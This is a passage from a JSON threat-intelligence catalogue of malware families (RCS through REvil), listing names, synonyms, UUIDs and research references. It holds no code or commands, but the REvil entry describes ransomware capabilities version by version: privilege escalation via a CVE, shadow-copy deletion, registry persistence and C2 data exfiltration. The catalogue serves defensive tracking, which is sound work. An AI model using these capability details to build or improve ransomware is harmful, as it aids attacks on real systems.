"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ "Crisis", "Remote Control System" ], "type": [] }, "uuid": "c359c74e-4155-4e66-a344-b56947f75119", "value": "RCS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" ], "synonyms": [], "type": [] }, "uuid": "40eff712-4812-4b8a-872d-7c9f4b7a8d72", "value": "RCtrl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" ], "synonyms": [ "GREYSTUFF" ], "type": [] }, "uuid": "69798a1e-1caf-4bc8-b4af-6508d8a26717", "value": "RDAT" }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", "value": "ReactorBot" }, { "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" ], "synonyms": [], "type": [] }, "uuid": "826c31ca-2617-47e4-b236-205da3881182", "value": "Reaver" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", "https://www.recordedfuture.com/redalpha-cyber-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", "https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/", "https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware", "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html", "https://www.us-cert.gov/ncas/alerts/TA17-117A" ], "synonyms": [ "BUGJUICE" ], "type": [] }, "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", "value": "RedLeaves" }, { "description": "Redline Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" ], "synonyms": [], "type": [] }, "uuid": "ff18a858-7778-485c-949b-d28d867d1ffb", "value": "RedLine Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper", "https://twitter.com/ItsReallyNick/status/1136502701301346305" ], "synonyms": [ "Adupib" ], "type": [] }, "uuid": "42fc1cf4-23ee-47a6-bdd3-7dc824948ba7", "value": "REDPEPPER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum", "https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html" ], "synonyms": [ "Grinch", "Thanos", "Tycoon" ], "type": [] }, "uuid": "cbb4cfd8-3642-4b04-a199-8e9b4b80fb62", "value": "RedRum Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt", "https://twitter.com/ItsReallyNick/status/1136502701301346305", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf" ], "synonyms": [ "Dipsind" ], "type": [] }, "uuid": "da2210c7-c953-4367-9f4b-778e77af7ce7", "value": "REDSALT" }, { "description": "REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl", "https://content.fireeye.com/apt/rpt-apt38", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" ], "synonyms": [], "type": [] }, "uuid": "799cce43-6ba0-4e21-9a63-f8b7f9bb7cc4", "value": "REDSHAWL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms", "https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/" ], "synonyms": [], "type": [] }, "uuid": "36893c2a-28ad-4dd3-a66b-906f1dd15b92", "value": "Redyms" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", "https://twitter.com/JaromirHorejsi/status/816237293073797121" ], "synonyms": [], "type": [] }, "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", "value": "Red Alert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" ], "synonyms": [], "type": [] }, "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", "value": "Red Gambler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", "https://sensepost.com/discover/tools/reGeorg/", "https://github.com/sensepost/reGeorg" ], "synonyms": [], "type": [] }, "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", "value": "reGeorg" }, { "description": "Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://www.youtube.com/watch?v=jeLd-gw2bWo", "https://www.epicturla.com/previous-works/hitb2020-voltron-sta", "https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", "value": "Regin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker", "http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/", "https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/", "https://twitter.com/malwrhunterteam/status/1321375502179905536" ], "synonyms": [], "type": [] }, "uuid": "f89df0d5-2d01-49a2-a2d0-71cdc6a9d64e", "value": "RegretLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom", "https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html" ], "synonyms": [ "GHack Ransomware" ], "type": [] }, "uuid": "b59a97df-04c5-4e54-a7aa-92452baa7240", "value": "RekenSom Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader", "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html" ], "synonyms": [], "type": [] }, "uuid": "431808a0-3671-4072-a9af-9947a54b4b9d", "value": "Rekt Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware", "https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html" ], "synonyms": [ "PRZT Ransomware" ], "type": [] }, "uuid": "b40a66c6-c8fa-43c3-8084-87e90f00a8f1", "value": "Rektware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom", "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef" ], "synonyms": [ "RemoteCommandExecution" ], "type": [] }, "uuid": "135ce3db-a242-4f81-844a-cf03eb72c291", "value": "RemCom" }, { "description": "Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers.\r\nRemcos, once installed, opens a backdoor on the computer, granting full access to the remote user. \r\nRemcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", "https://dissectingmalwa.re/malicious-ratatouille.html", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html", "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", "https://secrary.com/ReversingMalware/RemcosRAT/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/", "https://www.youtube.com/watch?v=DIH4SvKuktM" ], "synonyms": [ "RemcosRAT", "Remvio", "Socmer" ], "type": [] }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", "value": "Remcos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "https://www.secureworks.com/research/threat-profiles/cobalt-hickman", "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf", "https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "https://securelist.com/chafer-used-remexi-malware/89538/", "https://twitter.com/QW5kcmV3/status/1095833216605401088" ], "synonyms": [ "CACHEMONEY" ], "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", "value": "Remexi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=hacktool:win32/remoteadmin&ThreatID=2147731874" ], "synonyms": [], "type": [] }, "uuid": "6730a859-f2b9-48f9-8d2b-22944a79c072", "value": "RemoteAdmin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient", "https://github.com/frozleaf/RemoteControl" ], "synonyms": [ "remotecontrolclient" ], "type": [] }, "uuid": "44aae79d-c2f5-47f6-99c1-540c0c5420db", "value": "RemoteControl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-2.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf", "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis-part-3.html", "https://artemonsecurity.blogspot.com/2016/10/remsec-driver-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", "value": "Remsec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" ], "synonyms": [ "WINDSHIELD" ], "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", "value": "Remy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" ], "synonyms": [], "type": [] }, "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", "value": "Rerdom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/", "https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/" ], "synonyms": [], "type": [] }, "uuid": "42fa55e3-e708-4c11-b807-f31573639941", "value": "Retadup" }, { "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://github.com/cocaman/retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://github.com/Tomasuh/retefe-unpacker", "https://vulnerability.ch/2019/05/analysing-retefe-with-sysmon-and-splunk/" ], "synonyms": [ "Tsukuba", "Werdlod" ], "type": [] }, "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39", "value": "Retefe (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro", "https://blog.360totalsecurity.com/en/analysis-cve-2018-8174-vbscript-0day-apt-actor-related-office-targeted-attack/", "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/", "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] }, "uuid": "a4dc538e-09b7-4dba-99b0-e8b8b70dd42a", "value": "Retro" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://securelist.com/revengehotels/95229/", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", "https://blogs.360.cn/post/APT-C-44.html", "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], "synonyms": [ "Revetrat" ], "type": [] }, "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", "value": "Revenge RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton", "https://krebsonsecurity.com/2012/08/inside-a-reveton-ransomware-operation/" ], "synonyms": [], "type": [] }, "uuid": "48c10822-9af8-4324-9516-b33ecf975590", "value": "Reveton Ransomware" }, { "description": "REvil Beta\r\nMD5: bed6fc04aeb785815744706239a1f243\r\nSHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf\r\nSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45\r\n* Privilege escalation via CVE-2018-8453 (64-bit only)\r\n* Rerun with RunAs to elevate privileges\r\n* Implements a requirement that if \"exp\" is set, privilege escalation must be successful for full execution to occur\r\n* Implements target whitelisting using GetKetboardLayoutList\r\n* Contains debug console logging functionality\r\n* Defines the REvil registry root key as SOFTWARE\\!test\r\n* Includes two variable placeholders in the ransom note: UID & KEY\r\n* Terminates processes specified in the \"prc\" configuration key prior to encryption\r\n* Deletes shadow copies and disables recovery\r\n* Wipes contents of folders specified in the \"wfld\" configuration key prior to encryption\r\n* Encrypts all non-whitelisted files on fixed drives\r\n* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe\r\n* Partially implements a background image setting to display a basic \"Image text\" message\r\n* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)\r\n------------------------------------\r\nREvil 1.00\r\nMD5: 65aa793c000762174b2f86077bdafaea\r\nSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457\r\nSHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc\r\n* Adds 32-bit implementation of CVE-2018-8453 exploit\r\n* Removes console debug logging\r\n* Changes the REvil registry root key to SOFTWARE\\recfg\r\n* Removes the System/Impersonation success requirement for encrypting network mapped drives\r\n* Adds a \"wipe\" key to the configuration for optional folder wiping\r\n* Fully implements the background image setting and leverages values defined in the \"img\" configuration key\r\n* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT\r\n* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL\r\n* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data\r\n------------------------------------\r\nREvil 1.01\r\nMD5: 2abff29b4d87f30f011874b6e98959e9\r\nSHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c\r\nSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb\r\n* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level\r\n* Makes encryption of network mapped drives optional by adding the \"-nolan\" argument\r\n------------------------------------\r\nREvil 1.02\r\nMD5: 4af953b20f3a1f165e7cf31d6156c035\r\nSHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299\r\nSHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4\r\n* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage\r\n* Partially implements \"lock file\" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)\r\n* Enhances folder whitelisting logic that take special considerations if the folder is associated with \"program files\" directories\r\n* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories\r\n* Hard-codes whitelisting of \"sql\" subfolders within program files\r\n* Encrypts program files sub-folders that does not contain \"sql\" in the path\r\n* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted\r\n* Encodes stored strings used for URI building within the binary and decodes them in memory right before use\r\n* Introduces a REvil registry root key \"sub_key\" registry value containing the attacker's public key\r\n------------------------------------\r\nREvil 1.03\r\nMD5: 3cae02306a95564b1fff4ea45a7dfc00\r\nSHA1: 0ce2cae5287a64138d273007b34933362901783d\r\nSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf\r\n* Removes lock file logic that was partially implemented in 1.02\r\n* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)\r\n* Encodes stored shellcode\r\n* Adds the -path argument:\r\n* Does not wipe folders (even if wipe == true)\r\n* Does not set desktop background\r\n* Does not contact the C2 server (even if net == true)\r\n* Encrypts files in the specified folder and drops the ransom note\r\n* Changes the REvil registry root key to SOFTWARE\\QtProject\\OrganizationDefaults\r\n* Changes registry key values from --> to:\r\n * sub_key --> pvg\r\n * pk_key --> sxsP\r\n * sk_key --> BDDC8\r\n * 0_key --> f7gVD7\r\n * rnd_ext --> Xu7Nnkd\r\n * stat --> sMMnxpgk\r\n------------------------------------\r\nREvil 1.04\r\nMD5: 6e3efb83299d800edf1624ecbc0665e7\r\nSHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d\r\nSHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6\r\n* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)\r\n* Removes the folder wipe capability\r\n* Changes the REvil registry root key to SOFTWARE\\GitForWindows\r\n* Changes registry key values from --> to:\r\n * pvg --> QPM\r\n * sxsP --> cMtS\r\n * BDDC8 --> WGg7j\r\n * f7gVD7 --> zbhs8h\r\n * Xu7Nnkd --> H85TP10\r\n * sMMnxpgk --> GCZg2PXD\r\n------------------------------------\r\nREvil v1.05\r\nMD5: cfefcc2edc5c54c74b76e7d1d29e69b2\r\nSHA1: 7423c57db390def08154b77e2b5e043d92d320c7\r\nSHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea\r\n* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.\r\n* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :\r\n * SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lNOWZyAWVv\r\n* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.\r\n* Changes registry key values from --> to:\r\n * QPM --> tgE\r\n * cMtS --> 8K09\r\n * WGg7j --> xMtNc\r\n * zbhs8h --> CTgE4a\r\n * H85TP10 --> oE5bZg0\r\n * GCZg2PXD --> DC408Qp4\r\n------------------------------------\r\nREvil v1.06\r\nMD5: 65ff37973426c09b9ff95f354e62959e\r\nSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e\r\nSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e\r\n* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.\r\n* Modified handling of network file encryption. Now explicitly passes every possible \"Scope\" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type\" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.\r\n* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'\r\n* Changes registry key values from --> to:\r\n * tgE --> 73g\r\n * 8K09 --> vTGj\r\n * xMtNc --> Q7PZe\r\n * CTgE4a --> BuCrIp\r\n * oE5bZg0 --> lcZd7OY\r\n * DC408Qp4 --> sLF86MWC\r\n------------------------------------\r\nREvil v1.07\r\nMD5: ea4cae3d6d8150215a4d90593a4c30f2\r\nSHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e\r\nSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3\r\nTBD", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", 